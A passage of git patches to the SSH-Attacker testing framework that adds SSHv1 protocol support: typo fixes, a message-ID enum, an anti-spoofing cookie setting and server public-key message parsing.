a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/VersionExchangeMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/VersionExchangeMessage.java index 14324e722..43f8f98c5 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/VersionExchangeMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/VersionExchangeMessage.java @@ -107,6 +107,6 @@ public VersionExchangeMessageSerializer getSerializer(SshContext context) { @Override public String toShortString() { - return "VESION_EXCHANGE"; + return "VERSION_EXCHANGE"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/MessageAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/MessageAction.java index 103f5b181..f487a9412 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/MessageAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/MessageAction.java @@ -16,6 +16,7 @@ import de.rub.nds.sshattacker.core.protocol.authentication.message.*; import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessage; import de.rub.nds.sshattacker.core.protocol.connection.message.*; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.VersionExchangeMessageSSHV1; import de.rub.nds.sshattacker.core.protocol.transport.message.*; import jakarta.xml.bind.annotation.XmlElement; import jakarta.xml.bind.annotation.XmlElementWrapper; @@ -165,7 +166,8 @@ public abstract class MessageAction extends ConnectionBoundAction { @XmlElement(type = UnimplementedMessage.class, name = "UnimplementedMessage"), @XmlElement(type = UnknownMessage.class, name = "UnknownMessage"), @XmlElement(type = VersionExchangeMessage.class, name = "VersionExchange"), - @XmlElement(type = AsciiMessage.class, name = "AsciiMessage") + @XmlElement(type = AsciiMessage.class, name = "AsciiMessage"), + @XmlElement(type = VersionExchangeMessageSSHV1.class, name = "VersionExchangeSSH1"), }) protected List> messages = new ArrayList<>(); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceiveAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceiveAction.java index 73c6d0029..41147e88f 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceiveAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceiveAction.java @@ -14,6 +14,7 @@ import de.rub.nds.sshattacker.core.protocol.authentication.message.*; import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessage; import de.rub.nds.sshattacker.core.protocol.connection.message.*; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.VersionExchangeMessageSSHV1; import de.rub.nds.sshattacker.core.protocol.transport.message.*; import de.rub.nds.sshattacker.core.state.State; import jakarta.xml.bind.annotation.XmlElement; @@ -154,7 +155,8 @@ public class ReceiveAction extends MessageAction implements ReceivingAction { @XmlElement(type = UnimplementedMessage.class, name = "UnimplementedMessage"), @XmlElement(type = UnknownMessage.class, name = "UnknownMessage"), @XmlElement(type = VersionExchangeMessage.class, name = "VersionExchange"), - @XmlElement(type = AsciiMessage.class, name = "AsciiMessage") + @XmlElement(type = AsciiMessage.class, name = "AsciiMessage"), + @XmlElement(type = VersionExchangeMessageSSHV1.class, name = "VersionExchangeSSH1"), }) protected List> expectedMessages = new ArrayList<>(); diff --git a/SSH-Server/src/main/java/de/rub/nds/sshattacker/server/config/ServerCommandConfig.java b/SSH-Server/src/main/java/de/rub/nds/sshattacker/server/config/ServerCommandConfig.java index 9e3a4d7a9..82983e488 100644 --- a/SSH-Server/src/main/java/de/rub/nds/sshattacker/server/config/ServerCommandConfig.java +++ b/SSH-Server/src/main/java/de/rub/nds/sshattacker/server/config/ServerCommandConfig.java @@ -20,6 +20,7 @@ public class ServerCommandConfig extends SshDelegateConfig { @ParametersDelegate private final ServerDelegate serverDelegate; @ParametersDelegate private final ConfigOutputDelegate configOutputDelegate; @ParametersDelegate private final TimeoutDelegate timeoutDelegate; + @ParametersDelegate private final ProtocolVersionDelegate protocolVersionDelegate; @ParametersDelegate private final WorkflowInputDelegate workflowInputDelegate; @ParametersDelegate private final WorkflowOutputDelegate workflowOutputDelegate; @ParametersDelegate private final WorkflowTypeDelegate workflowTypeDelegate; @@ -32,12 +33,14 @@ public ServerCommandConfig(GeneralDelegate delegate) { this.workflowInputDelegate = new WorkflowInputDelegate(); this.workflowOutputDelegate = new WorkflowOutputDelegate(); this.workflowTypeDelegate = new WorkflowTypeDelegate(); + this.protocolVersionDelegate = new ProtocolVersionDelegate(); addDelegate(serverDelegate); addDelegate(configOutputDelegate); addDelegate(timeoutDelegate); addDelegate(workflowInputDelegate); addDelegate(workflowOutputDelegate); addDelegate(workflowTypeDelegate); + addDelegate(protocolVersionDelegate); } @Override From 825ff67883a9cb7a2fa1dc33355c19bc0745027a Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Fri, 28 Jul 2023 23:10:39 +0200 Subject: [PATCH 048/176] wip: fixing Typo --- .../sshattacker/core/constants/ProtocolMessageTypeSSHV1.java | 2 +- .../java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java | 2 +- .../de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/ProtocolMessageTypeSSHV1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/ProtocolMessageTypeSSHV1.java index 854524929..1b8c0f9a1 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/ProtocolMessageTypeSSHV1.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/ProtocolMessageTypeSSHV1.java @@ -11,7 +11,7 @@ import java.util.Map; public enum ProtocolMessageTypeSSHV1 { - VERSION_EXCHANGE_MESSAG_ESSH1((byte) 0), + VERSION_EXCHANGE_MESSAGE_SSH1((byte) 0), ASCII_MESSAGE((byte) 40), SSH_MSG_DISCONNECT((byte) 1), SSH_SMSG_PUBLIC_KEY((byte) 2), diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java index aace52884..57ba9bcfc 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java @@ -193,7 +193,7 @@ public void readMessageForHint(PacketLayerHintSSHV1 hint) { case ASCII_MESSAGE: readASCIIData(); break; - case VERSION_EXCHANGE_MESSAG_ESSH1: + case VERSION_EXCHANGE_MESSAGE_SSH1: readVersionExchangeProtocolData(); case SSH_CMSG_AUTH_RHOSTS_RSA: // Read CMSG_AUTH_RHOSTS_RSA diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java index cca6a957e..08571b37a 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java @@ -241,7 +241,7 @@ public LayerProcessingHint parseMessageId(AbstractPacket packet, SshContext cont return new PacketLayerHint(ProtocolMessageType.VERSION_EXCHANGE_MESSAGE); } else if (rawText.startsWith("SSH-1")) { return new PacketLayerHintSSHV1( - ProtocolMessageTypeSSHV1.VERSION_EXCHANGE_MESSAG_ESSH1); + ProtocolMessageTypeSSHV1.VERSION_EXCHANGE_MESSAGE_SSH1); } else { final AsciiMessage message = new AsciiMessage(); AsciiMessageParser parser = new AsciiMessageParser(new ByteArrayInputStream(raw)); From c48c1095d4611682593028f1627ef00ed81cb49d Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Thu, 3 Aug 2023 22:12:17 +0200 Subject: [PATCH 049/176] wip: Public Key Message is sending and recieving data, but mulit-precision is missing --- .../nds/sshattacker/core/config/Config.java | 15 + .../core/constants/MessageIdConstantSSH1.java | 255 +++++++++++++++ .../core/layer/context/SshContext.java | 10 + .../core/layer/impl/SSH1Layer.java | 9 +- .../core/layer/impl/TransportLayer.java | 291 ++++++++++++++++- .../protocol/common/SshMessageParser.java | 5 + .../protocol/common/SshMessagePreparator.java | 12 +- .../ServerPublicKeyMessageHandler.java | 121 +++++++ .../ssh1/message/ServerPublicKeyMessage.java | 308 ++++++++++++++++++ .../parser/ServerPublicKeyMessageParser.java | 167 ++++++++++ .../ServerPublicKeyMessagePreparator.java | 216 ++++++++++++ .../ServerPublicKeyMessageSerializer.java | 119 +++++++ .../core/workflow/action/MessageAction.java | 2 + .../core/workflow/action/ReceiveAction.java | 2 + .../factory/WorkflowConfigurationFactory.java | 23 ++ .../workflow/factory/WorkflowTraceType.java | 3 +- 16 files changed, 1542 insertions(+), 16 deletions(-) create mode 100755 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/MessageIdConstantSSH1.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ServerPublicKeyMessageHandler.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ServerPublicKeyMessage.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ServerPublicKeyMessageParser.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ServerPublicKeyMessagePreparator.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ServerPublicKeyMessageSerializer.java diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/Config.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/Config.java index 94d09fa56..17e0318f4 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/Config.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/Config.java @@ -103,6 +103,9 @@ public void setDefaultAdditionalPadding(Integer defaultAdditionalPadding) { @XmlJavaTypeAdapter(UnformattedByteArrayAdapter.class) private byte[] serverCookie; + @XmlJavaTypeAdapter(UnformattedByteArrayAdapter.class) + private byte[] antiSpoofingCookie; + /** List of key exchange algorithms supported by the remote peer */ @XmlElement(name = "clientSupportedKeyExchangeAlgorithm") @XmlElementWrapper @@ -503,6 +506,10 @@ public Config() { clientCookie = ArrayConverter.hexStringToByteArray("00000000000000000000000000000000"); serverCookie = ArrayConverter.hexStringToByteArray("00000000000000000000000000000000"); + antiSpoofingCookie = + ArrayConverter.hexStringToByteArray( + "0000000000000000"); // 16 Byte Anti-Spoofing-Cookie + // Default values for cryptographic parameters are taken from OpenSSH 8.2p1 clientSupportedKeyExchangeAlgorithms = Arrays.stream( @@ -984,6 +991,10 @@ public byte[] getServerCookie() { return serverCookie; } + public byte[] getAntiSpoofingCookie() { + return antiSpoofingCookie; + } + public String getClientEndOfMessageSequence() { return clientEndOfMessageSequence; } @@ -1125,6 +1136,10 @@ public int getServerReserved() { // endregion // region Setters for Pre-KeyExchange + public void setAntiSpoofingCookie(byte[] antiSpoofingCookie) { + this.antiSpoofingCookie = antiSpoofingCookie; + } + public void setClientCookie(byte[] clientCookie) { this.clientCookie = clientCookie; } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/MessageIdConstantSSH1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/MessageIdConstantSSH1.java new file mode 100755 index 000000000..3de80a491 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/MessageIdConstantSSH1.java @@ -0,0 +1,255 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.constants; + +import de.rub.nds.sshattacker.core.exceptions.ParserException; +import de.rub.nds.sshattacker.core.state.Context; +import java.util.*; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public enum MessageIdConstantSSH1 { + VERSION_EXCHANGE_MESSAGE_SSH1((byte) 0), + ASCII_MESSAGE((byte) 40), + SSH_MSG_DISCONNECT((byte) 1), + SSH_SMSG_PUBLIC_KEY((byte) 2), + SSH_CMSG_SESSION_KEY((byte) 3), + SSH_CMSG_USER((byte) 4), + SSH_CMSG_AUTH_RHOSTS((byte) 5), + SSH_CMSG_AUTH_RSA((byte) 6), + SSH_SMSG_AUTH_RSA_CHALLENGE((byte) 7), + SSH_CMSG_AUTH_RSA_RESPONSE((byte) 8), + SSH_CMSG_AUTH_PASSWORD((byte) 9), + SSH_CMSG_REQUEST_PTY((byte) 10), + SSH_CMSG_WINDOW_SIZE((byte) 11), + SSH_CMSG_EXEC_SHELL((byte) 12), + SSH_CMSG_EXEC_CMD((byte) 13), + SSH_SMSG_SUCCESS((byte) 14), + SSH_SMSG_FAILURE((byte) 15), + SSH_CMSG_STDIN_DATA((byte) 16), + SSH_SMSG_STDOUT_DATA((byte) 17), + SSH_SMSG_STDERR_DATA((byte) 18), + SSH_CMSG_EOF((byte) 19), + SSH_SMSG_EXITSTATUS((byte) 20), + SSH_MSG_CHANNEL_OPEN_CONFIRMATION((byte) 21), + SSH_MSG_CHANNEL_OPEN_FAILURE((byte) 22), + SSH_MSG_CHANNEL_DATA((byte) 23), + SSH_MSG_CHANNEL_CLOSE((byte) 24), + SSH_MSG_CHANNEL_CLOSE_CONFIRMATION((byte) 25), + SSH_SMSG_X11_OPEN((byte) 27), + SSH_CMSG_PORT_FORWARD_REQUEST((byte) 28), + SSH_MSG_PORT_OPEN((byte) 29), + SSH_CMSG_AGENT_REQUEST_FORWARDING((byte) 30), + SSH_SMSG_AGENT_OPEN((byte) 31), + SSH_MSG_IGNORE((byte) 32), + SSH_CMSG_EXIT_CONFIRMATION((byte) 33), + SSH_CMSG_X11_REQUEST_FORWARDING((byte) 34), + SSH_CMSG_AUTH_RHOSTS_RSA((byte) 35), + SSH_MSG_DEBUG((byte) 36), + SSH_CMSG_REQUEST_COMPRESSION((byte) 37); + + /* + * Sources: + * - https://www.iana.org/assignments/ssh-parameters/ssh-parameters.xhtml#ssh-parameters-1 + */ + // [ RFC 4253 ] + /*VERSION_EXCHANGE_MESSAGE((byte) 200), + ASCII_MESSAGE((byte) 201), + SSH_MSG_DISCONNECT((byte) 1), + SSH_MSG_IGNORE((byte) 2), + SSH_MSG_UNIMPLEMENTED((byte) 3), + SSH_MSG_DEBUG((byte) 4), + SSH_MSG_SERVICE_REQUEST((byte) 5), + SSH_MSG_SERVICE_ACCEPT((byte) 6), + // [ RFC 8308 ] + SSH_MSG_EXT_INFO((byte) 7), + SSH_MSG_NEWCOMPRESS((byte) 8), + // 9 - 19 unassigned (transport layer generic) + SSH_MSG_KEXINIT((byte) 20), + SSH_MSG_NEWKEYS((byte) 21), + // 22 - 29 unassigned (algorithm negotiation) + // 30 - 49 reserved (key exchange method specific) + // [ RFC 4419 ] + SSH_MSG_KEX_DH_GEX_REQUEST_OLD((byte) 30, KeyExchangeFlowType.DIFFIE_HELLMAN_GROUP_EXCHANGE), + SSH_MSG_KEX_DH_GEX_REQUEST((byte) 34, KeyExchangeFlowType.DIFFIE_HELLMAN_GROUP_EXCHANGE), + SSH_MSG_KEX_DH_GEX_GROUP((byte) 31, KeyExchangeFlowType.DIFFIE_HELLMAN_GROUP_EXCHANGE), + SSH_MSG_KEX_DH_GEX_INIT((byte) 32, KeyExchangeFlowType.DIFFIE_HELLMAN_GROUP_EXCHANGE), + SSH_MSG_KEX_DH_GEX_REPLY((byte) 33, KeyExchangeFlowType.DIFFIE_HELLMAN_GROUP_EXCHANGE), + // [ RFC 4253 ] + SSH_MSG_KEXDH_INIT((byte) 30, KeyExchangeFlowType.DIFFIE_HELLMAN), + SSH_MSG_KEXDH_REPLY((byte) 31, KeyExchangeFlowType.DIFFIE_HELLMAN), + // [ https://datatracker.ietf.org/doc/html/draft-kampanakis-curdle-pq-ssh-00 ] + SSH_MSG_HBR_INIT((byte) 30, KeyExchangeFlowType.HYBRID), + SSH_MSG_HBR_REPLY((byte) 31, KeyExchangeFlowType.HYBRID), + // [ RFC 5656 ] + SSH_MSG_KEX_ECDH_INIT((byte) 30, KeyExchangeFlowType.ECDH), + SSH_MSG_KEX_ECDH_REPLY((byte) 31, KeyExchangeFlowType.ECDH), + SSH_MSG_ECMQV_INIT((byte) 30, KeyExchangeFlowType.ECMQV), + SSH_MSG_ECMQV_REPLY((byte) 31, KeyExchangeFlowType.ECMQV), + // [ RFC 4432 ] + SSH_MSG_KEXRSA_PUBKEY((byte) 30, KeyExchangeFlowType.RSA), + SSH_MSG_KEXRSA_SECRET((byte) 31, KeyExchangeFlowType.RSA), + SSH_MSG_KEXRSA_DONE((byte) 32, KeyExchangeFlowType.RSA), + // [ RFC 4462 ] + // TODO: Add specificTo on GSS messages + SSH_MSG_KEXGSS_INIT((byte) 30), + SSH_MSG_KEXGSS_CONTINUE((byte) 31), + SSH_MSG_KEXGSS_COMPLETE((byte) 32), + SSH_MSG_KEXGSS_HOSTKEY((byte) 33), + SSH_MSG_KEXGSS_ERROR((byte) 34), + SSH_MSG_KEXGSS_GROUPREQ((byte) 40), + SSH_MSG_KEXGSS_GROUP((byte) 41), + // [ RFC 4252 ] + SSH_MSG_USERAUTH_REQUEST((byte) 50), + SSH_MSG_USERAUTH_FAILURE((byte) 51), + SSH_MSG_USERAUTH_SUCCESS((byte) 52), + SSH_MSG_USERAUTH_BANNER((byte) 53), + // 54 - 59 unassigned (user authentication generic) + // 60 - 79 reserved (user authentication method specific) + // [ RFC 4252 ] + SSH_MSG_USERAUTH_PK_OK((byte) 60, AuthenticationMethod.PUBLICKEY), + SSH_MSG_USERAUTH_PASSWD_CHANGEREQ((byte) 60, AuthenticationMethod.PASSWORD), + // [ RFC 4256 ] + SSH_MSG_USERAUTH_INFO_REQUEST((byte) 60, AuthenticationMethod.KEYBOARD_INTERACTIVE), + SSH_MSG_USERAUTH_INFO_RESPONSE((byte) 61, AuthenticationMethod.KEYBOARD_INTERACTIVE), + // [ RFC 4462 ] + SSH_MSG_USERAUTH_GSSAPI_RESPONSE( + (byte) 60, + new AuthenticationMethod[] { + AuthenticationMethod.GSSAPI, + AuthenticationMethod.GSSAPI_WITH_MIC, + AuthenticationMethod.GSSAPI_KEYEX + }), + SSH_MSG_USERAUTH_GSSAPI_TOKEN( + (byte) 61, + new AuthenticationMethod[] { + AuthenticationMethod.GSSAPI, + AuthenticationMethod.GSSAPI_WITH_MIC, + AuthenticationMethod.GSSAPI_KEYEX + }), + SSH_MSG_USERAUTH_GSSAPI_EXCHANGE_COMPLETE( + (byte) 63, + new AuthenticationMethod[] { + AuthenticationMethod.GSSAPI, + AuthenticationMethod.GSSAPI_WITH_MIC, + AuthenticationMethod.GSSAPI_KEYEX + }), + SSH_MSG_USERAUTH_GSSAPI_ERROR( + (byte) 64, + new AuthenticationMethod[] { + AuthenticationMethod.GSSAPI, + AuthenticationMethod.GSSAPI_WITH_MIC, + AuthenticationMethod.GSSAPI_KEYEX + }), + SSH_MSG_USERAUTH_GSSAPI_ERRTOK( + (byte) 65, + new AuthenticationMethod[] { + AuthenticationMethod.GSSAPI, + AuthenticationMethod.GSSAPI_WITH_MIC, + AuthenticationMethod.GSSAPI_KEYEX + }), + SSH_MSG_USERAUTH_GSSAPI_MIC( + (byte) 66, + new AuthenticationMethod[] { + AuthenticationMethod.GSSAPI, + AuthenticationMethod.GSSAPI_WITH_MIC, + AuthenticationMethod.GSSAPI_KEYEX + }), + // [ RFC 4254 ] + SSH_MSG_GLOBAL_REQUEST((byte) 80), + SSH_MSG_REQUEST_SUCCESS((byte) 81), + SSH_MSG_REQUEST_FAILURE((byte) 82), + // 83 - 89 unassigned (connection protocol generic) + SSH_MSG_CHANNEL_OPEN((byte) 90), + SSH_MSG_CHANNEL_OPEN_CONFIRMATION((byte) 91), + SSH_MSG_CHANNEL_OPEN_FAILURE((byte) 92), + SSH_MSG_CHANNEL_WINDOW_ADJUST((byte) 93), + SSH_MSG_CHANNEL_DATA((byte) 94), + SSH_MSG_CHANNEL_EXTENDED_DATA((byte) 95), + SSH_MSG_CHANNEL_EOF((byte) 96), + SSH_MSG_CHANNEL_CLOSE((byte) 97), + SSH_MSG_CHANNEL_REQUEST((byte) 98), + SSH_MSG_CHANNEL_SUCCESS((byte) 99), + SSH_MSG_CHANNEL_FAILURE((byte) 100), + // 101 - 127 unassigned (channel related messages) + // 128 - 191 reserved (for client protocols) + // 192 - 255 reserved for private use (local extensions) + UNKNOWN((byte) 255);*/ + + private final byte id; + private final Enum[] specificTo; + + public static final Map> map; + + private static final Logger LOGGER = LogManager.getLogger(); + + static { + Map> mutableMap = new TreeMap<>(); + for (MessageIdConstantSSH1 constant : MessageIdConstantSSH1.values()) { + mutableMap.putIfAbsent(constant.id, new LinkedList<>()); + mutableMap.get(constant.id).add(constant); + } + mutableMap.replaceAll((k, v) -> Collections.unmodifiableList(mutableMap.get(k))); + map = Collections.unmodifiableMap(mutableMap); + } + + MessageIdConstantSSH1(byte id) { + this.id = id; + this.specificTo = new Enum[] {}; + } + + MessageIdConstantSSH1(byte id, Enum... specificTo) { + this.id = id; + this.specificTo = specificTo; + } + + public byte getId() { + return id; + } + + public static String getNameById(byte id) { + if (map.containsKey(id)) { + return map.get(id).toString(); + } else { + return String.format("0x%02X", id); + } + } + + public static MessageIdConstantSSH1 fromId(byte id, Context context) { + List idList = map.get(id); + if (idList == null) { + LOGGER.warn("Unknonw Message-ID: {}", id); + throw new ParserException("Unable to parse message with unknown id"); + } + if (id >= (byte) 30 && id <= (byte) 49) { + KeyExchangeAlgorithm kexInContext = context.getChooser().getKeyExchangeAlgorithm(); + for (MessageIdConstantSSH1 candidate : idList) { + if (Arrays.asList(candidate.specificTo).contains(kexInContext.getFlowType())) { + return candidate; + } + } + throw new ParserException( + "Unable to parse key exchange specific message in the current context"); + } + if (id >= (byte) 60 && id <= (byte) 79) { + AuthenticationMethod methodInContext = context.getChooser().getAuthenticationMethod(); + if (methodInContext == null) { + throw new ParserException( + "Unable to parse user authentication specific message id without selecting one first"); + } + for (MessageIdConstantSSH1 candidate : idList) { + if (Arrays.asList(candidate.specificTo).contains(methodInContext)) { + return candidate; + } + } + throw new ParserException( + "Unable to parse user authentication specific message in the current context"); + } + return idList.get(0); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java index b57a248ca..b2752f11b 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java @@ -230,6 +230,8 @@ public PacketCipher getActiveDecryptCipher() { private Integer maximalDhGroupSize; /** Host key */ private SshPublicKey hostKey; + + private SshPublicKey serverKey; /** Signature generated by the server over the exchange hash to authenticate the key exchange */ private byte[] serverExchangeHashSignature; /** Flag indicating whether the server exchange hash signature is valid */ @@ -880,6 +882,14 @@ public Optional getMaximalDhGroupSize() { return Optional.ofNullable(hostKey); } + public SshPublicKey getServerKey() { + return serverKey; + } + + public void setServerKey(SshPublicKey serverKey) { + this.serverKey = serverKey; + } + public Optional getServerExchangeHashSignature() { return Optional.ofNullable(serverExchangeHashSignature); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java index 57ba9bcfc..a218a6541 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java @@ -32,6 +32,7 @@ import de.rub.nds.sshattacker.core.layer.stream.HintedInputStream; import de.rub.nds.sshattacker.core.layer.stream.HintedLayerInputStream; import de.rub.nds.sshattacker.core.protocol.common.*; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ServerPublicKeyMessage; import de.rub.nds.sshattacker.core.protocol.ssh1.message.VersionExchangeMessageSSHV1; import de.rub.nds.sshattacker.core.protocol.transport.message.AsciiMessage; import de.rub.nds.sshattacker.core.protocol.transport.message.UnknownMessage; @@ -195,13 +196,14 @@ public void readMessageForHint(PacketLayerHintSSHV1 hint) { break; case VERSION_EXCHANGE_MESSAGE_SSH1: readVersionExchangeProtocolData(); + break; case SSH_CMSG_AUTH_RHOSTS_RSA: // Read CMSG_AUTH_RHOSTS_RSA case SSH_MSG_DISCONNECT: // Handle SSH_MSG_DISCONNECT message break; case SSH_SMSG_PUBLIC_KEY: - // Handle SSH_SMSG_PUBLIC_KEY message + readPublicKeyData(); break; case SSH_CMSG_SESSION_KEY: // Handle SSH_CMSG_SESSION_KEY message @@ -309,6 +311,11 @@ public void readMessageForHint(PacketLayerHintSSHV1 hint) { } } + private void readPublicKeyData() { + ServerPublicKeyMessage message = new ServerPublicKeyMessage(); + readDataContainer(message, context); + } + private void readASCIIData() { AsciiMessage message = new AsciiMessage(); readDataContainer(message, context); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java index 08571b37a..4c93f47e5 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java @@ -8,14 +8,12 @@ package de.rub.nds.sshattacker.core.layer.impl; import de.rub.nds.modifiablevariable.util.ArrayConverter; -import de.rub.nds.sshattacker.core.constants.MessageIdConstant; -import de.rub.nds.sshattacker.core.constants.PacketLayerType; -import de.rub.nds.sshattacker.core.constants.ProtocolMessageType; -import de.rub.nds.sshattacker.core.constants.ProtocolMessageTypeSSHV1; +import de.rub.nds.sshattacker.core.constants.*; import de.rub.nds.sshattacker.core.layer.LayerConfiguration; import de.rub.nds.sshattacker.core.layer.LayerProcessingResult; import de.rub.nds.sshattacker.core.layer.ProtocolLayer; import de.rub.nds.sshattacker.core.layer.constant.ImplementedLayers; +import de.rub.nds.sshattacker.core.layer.constant.LayerType; import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.layer.data.Preparator; import de.rub.nds.sshattacker.core.layer.data.Serializer; @@ -262,16 +260,285 @@ public LayerProcessingHint parseMessageId(AbstractPacket packet, SshContext cont } } + LOGGER.debug("Layertype: {}", this.getHigherLayer().getLayerType()); + + LayerType upperLayer = this.getHigherLayer().getLayerType(); + + if (upperLayer.getName().equals("SSHv1")) { + MessageIdConstantSSH1 id = + MessageIdConstantSSH1.fromId( + packet.getCleanProtocolMessageBytes().getValue()[0], + context.getContext()); + + LOGGER.debug( + "[bro] Identifier: {} and constant {}", + packet.getCleanProtocolMessageBytes().getValue()[0], + id); + + switch (id) { + case SSH_MSG_DISCONNECT: + LOGGER.debug("[bro] returning SSH_MSG_DISCONNECT Hint"); + return new PacketLayerHintSSHV1(ProtocolMessageTypeSSHV1.SSH_MSG_DISCONNECT); + case SSH_SMSG_PUBLIC_KEY: + LOGGER.debug("[bro] returning SSH_SMSG_PUBLIC_KEY Hint"); + return new PacketLayerHintSSHV1(ProtocolMessageTypeSSHV1.SSH_SMSG_PUBLIC_KEY); + case SSH_MSG_IGNORE: + LOGGER.debug("[bro] returning SSH_MSG_IGNORE Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_IGNORE); + case SSH_MSG_DEBUG: + LOGGER.debug("[bro] returning SSH_MSG_DEBUG Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_DEBUG); + case SSH_MSG_CHANNEL_OPEN_CONFIRMATION: + LOGGER.debug("[bro] returning SSH_MSG_CHANNEL_OPEN_CONFIRMATION Hint"); + return new PacketLayerHint( + ProtocolMessageType.SSH_MSG_CHANNEL_OPEN_CONFIRMATION); + case SSH_MSG_CHANNEL_OPEN_FAILURE: + LOGGER.debug("[bro] returning SSH_MSG_CHANNEL_OPEN_FAILURE Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_CHANNEL_OPEN_FAILURE); + case SSH_MSG_CHANNEL_DATA: + LOGGER.debug("[bro] returning SSH_MSG_CHANNEL_DATA Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_CHANNEL_DATA); + case SSH_MSG_CHANNEL_CLOSE: + LOGGER.debug("[bro] returning SSH_MSG_CHANNEL_CLOSE Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_CHANNEL_CLOSE); + default: + LOGGER.debug( + "[bro] cannot identifie {} as {} - returningn null", + raw[1], + MessageIdConstant.fromId( + packet.getCleanProtocolMessageBytes().getValue()[0], + context.getContext())); + return null; + } + + } else if (upperLayer.getName().equals("SSHv2")) { + MessageIdConstant id = + MessageIdConstant.fromId( + packet.getCleanProtocolMessageBytes().getValue()[0], + context.getContext()); + + LOGGER.debug( + "[bro] Identifier: {} and constant {}", + packet.getCleanProtocolMessageBytes().getValue()[0], + id); + + switch (id) { + case SSH_MSG_DISCONNECT: + LOGGER.debug("[bro] returning SSH_MSG_DISCONNECT Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_DISCONNECT); + case 